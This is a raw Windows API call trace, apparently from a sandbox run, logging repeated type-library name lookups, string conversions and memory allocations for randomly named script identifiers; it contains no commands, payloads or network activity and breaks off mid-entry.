[0068.924] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a617f6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="A4AA4Zw") returned 8 [0068.924] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="A4AA4Zw", lHashVal=0x102a80, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.924] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a617f6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="A4AA4Zw") returned 8 [0068.924] ITypeComp:RemoteBind (in: This=0x665bd30, szName="A4AA4Zw", lHashVal=0x102a80, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.924] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="A4AA4Zw") returned 0x102a80 [0068.924] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="A4AA4Zw" | out: _Dst="A4AA4Zw") returned 0x0 [0068.924] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="A4AA4Zw") returned 8 [0068.924] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.924] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="A4AA4Zw", lHashVal=0x102a80, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.925] IUnknown:Release (This=0x665ba50) returned 0xd [0068.925] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.925] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="A4AA4Zw", lHashVal=0x102a80, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.925] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.925] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.925] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="A4AA4Zw", lHashVal=0x102a80, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.925] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.925] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.925] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="A4AA4Zw", lHashVal=0x102a80, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.925] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a617f6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="A4AA4Zw") returned 8 [0068.925] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="A4AA4Zw", lHashVal=0x102a80, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.925] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.925] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a617f6 | out: _Dst=0x67c2d40) returned 0x0 [0068.925] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_A4AA4Zw") returned 0x102e04 [0068.925] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_A4AA4Zw" | out: _Dst="_B_var_A4AA4Zw") returned 0x0 [0068.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_A4AA4Zw") returned 15 [0068.925] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.925] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_A4AA4Zw", lHashVal=0x102e04, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.925] IUnknown:Release (This=0x665ba50) returned 0xd [0068.925] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.925] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_A4AA4Zw", lHashVal=0x102e04, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.925] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.925] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.925] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_A4AA4Zw", lHashVal=0x102e04, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.925] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.925] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.925] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_A4AA4Zw", lHashVal=0x102e04, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.925] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.925] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.925] IUnknown:Release (This=0x665ba50) returned 0xd [0068.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b102be, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_A4AA4Zw") returned 15 [0068.925] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_A4AA4Zw", lHashVal=0x102e04, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x41005f00720061, ppTypeComp=0x34004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x41005f00720061, ppTypeComp=0x34004100000000, pDummy=0x0) returned 0x0 [0068.925] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a617f6 | out: _Dst=0x144ec0) returned 0x0 [0068.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a617ca, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="kAXwc1oA") returned 9 [0068.926] ITypeComp:RemoteBind (in: This=0x665ba60, szName="kAXwc1oA", lHashVal=0x10b5ca, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a617ca, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="kAXwc1oA") returned 9 [0068.926] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="kAXwc1oA", lHashVal=0x10b5ca, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a617ca, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="kAXwc1oA") returned 9 [0068.926] ITypeComp:RemoteBind (in: This=0x665bd30, szName="kAXwc1oA", lHashVal=0x10b5ca, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.926] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="kAXwc1oA") returned 0x10b5ca [0068.926] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="kAXwc1oA" | out: _Dst="kAXwc1oA") returned 0x0 [0068.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="kAXwc1oA") returned 9 [0068.926] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.926] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="kAXwc1oA", lHashVal=0x10b5ca, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.926] IUnknown:Release (This=0x665ba50) returned 0xd [0068.926] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.926] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="kAXwc1oA", lHashVal=0x10b5ca, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.926] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.926] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.926] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="kAXwc1oA", lHashVal=0x10b5ca, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.926] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.926] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.926] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="kAXwc1oA", lHashVal=0x10b5ca, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.926] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a617ca, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="kAXwc1oA") returned 9 [0068.926] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="kAXwc1oA", lHashVal=0x10b5ca, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.926] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.926] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a617ca | out: _Dst=0x67c2d40) returned 0x0 [0068.926] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_kAXwc1oA") returned 0x108d53 [0068.926] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_kAXwc1oA" | out: _Dst="_B_var_kAXwc1oA") returned 0x0 [0068.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_kAXwc1oA") returned 16 [0068.926] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.926] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_kAXwc1oA", lHashVal=0x108d53, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.926] IUnknown:Release (This=0x665ba50) returned 0xd [0068.926] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.926] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_kAXwc1oA", lHashVal=0x108d53, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.926] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.926] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.926] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_kAXwc1oA", lHashVal=0x108d53, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.927] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.927] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.927] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_kAXwc1oA", lHashVal=0x108d53, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.927] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.927] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.927] IUnknown:Release (This=0x665ba50) returned 0xd [0068.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b102ee, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_kAXwc1oA") returned 16 [0068.927] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_kAXwc1oA", lHashVal=0x108d53, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6b005f00720061, ppTypeComp=0x63007700000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6b005f00720061, ppTypeComp=0x63007700000000, pDummy=0x0) returned 0x0 [0068.927] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a617ca | out: _Dst=0x144ec0) returned 0x0 [0068.927] ITypeComp:RemoteBind (in: This=0x665ba60, szName="tZQAUA", lHashVal=0x10a308, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61846, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="tZQAUA") returned 7 [0068.927] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="tZQAUA", lHashVal=0x10a308, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61846, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="tZQAUA") returned 7 [0068.927] ITypeComp:RemoteBind (in: This=0x665bd30, szName="tZQAUA", lHashVal=0x10a308, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.927] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tZQAUA") returned 0x10a308 [0068.927] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="tZQAUA" | out: _Dst="tZQAUA") returned 0x0 [0068.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="tZQAUA") returned 7 [0068.927] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.927] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="tZQAUA", lHashVal=0x10a308, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.927] IUnknown:Release (This=0x665ba50) returned 0xd [0068.927] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.927] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="tZQAUA", lHashVal=0x10a308, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.927] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.927] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.927] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="tZQAUA", lHashVal=0x10a308, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.927] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.927] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.927] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="tZQAUA", lHashVal=0x10a308, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.927] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61846, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="tZQAUA") returned 7 [0068.927] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="tZQAUA", lHashVal=0x10a308, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.928] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0068.928] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a61846 | out: _Dst=0x67c2d40) returned 0x0 [0068.928] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_tZQAUA") returned 0x101d72 [0068.928] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_tZQAUA" | out: _Dst="_B_var_tZQAUA") returned 0x0 [0068.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_tZQAUA") returned 14 [0068.928] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.928] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_tZQAUA", lHashVal=0x101d72, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.928] IUnknown:Release (This=0x665ba50) returned 0xd [0068.928] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.928] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_tZQAUA", lHashVal=0x101d72, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.928] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.928] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.928] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_tZQAUA", lHashVal=0x101d72, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.928] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.928] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.928] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_tZQAUA", lHashVal=0x101d72, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.928] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.928] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.928] IUnknown:Release (This=0x665ba50) returned 0xd [0068.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1031e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_tZQAUA") returned 14 [0068.928] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_tZQAUA", lHashVal=0x101d72, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x74005f00720061, ppTypeComp=0x55004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x74005f00720061, ppTypeComp=0x55004100000000, pDummy=0x0) returned 0x0 [0068.928] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a61846 | out: _Dst=0x144ec0) returned 0x0 [0068.928] ITypeComp:RemoteBind (in: This=0x665ba60, szName="nAAAQCx", lHashVal=0x100e9c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6186e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="nAAAQCx") returned 8 [0068.928] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="nAAAQCx", lHashVal=0x100e9c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6186e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="nAAAQCx") returned 8 [0068.928] ITypeComp:RemoteBind (in: This=0x665bd30, szName="nAAAQCx", lHashVal=0x100e9c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.928] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="nAAAQCx") returned 0x100e9c [0068.928] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="nAAAQCx" | out: _Dst="nAAAQCx") returned 0x0 [0068.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="nAAAQCx") returned 8 [0068.929] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.929] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="nAAAQCx", lHashVal=0x100e9c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.929] IUnknown:Release (This=0x665ba50) returned 0xd [0068.929] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.929] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="nAAAQCx", lHashVal=0x100e9c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.929] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.929] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.929] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="nAAAQCx", lHashVal=0x100e9c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.929] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.929] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.929] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="nAAAQCx", lHashVal=0x100e9c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.929] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6186e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="nAAAQCx") returned 8 [0068.929] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="nAAAQCx", lHashVal=0x100e9c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.929] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.929] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a6186e | out: _Dst=0x67c2d40) returned 0x0 [0068.929] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_nAAAQCx") returned 0x101220 [0068.929] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_nAAAQCx" | out: _Dst="_B_var_nAAAQCx") returned 0x0 [0068.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_nAAAQCx") returned 15 [0068.929] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.929] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_nAAAQCx", lHashVal=0x101220, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.929] IUnknown:Release (This=0x665ba50) returned 0xd [0068.929] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.929] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_nAAAQCx", lHashVal=0x101220, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.929] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.929] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.929] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_nAAAQCx", lHashVal=0x101220, pfName=0x144d70, pBstrLibName=0x144ca0 | out: 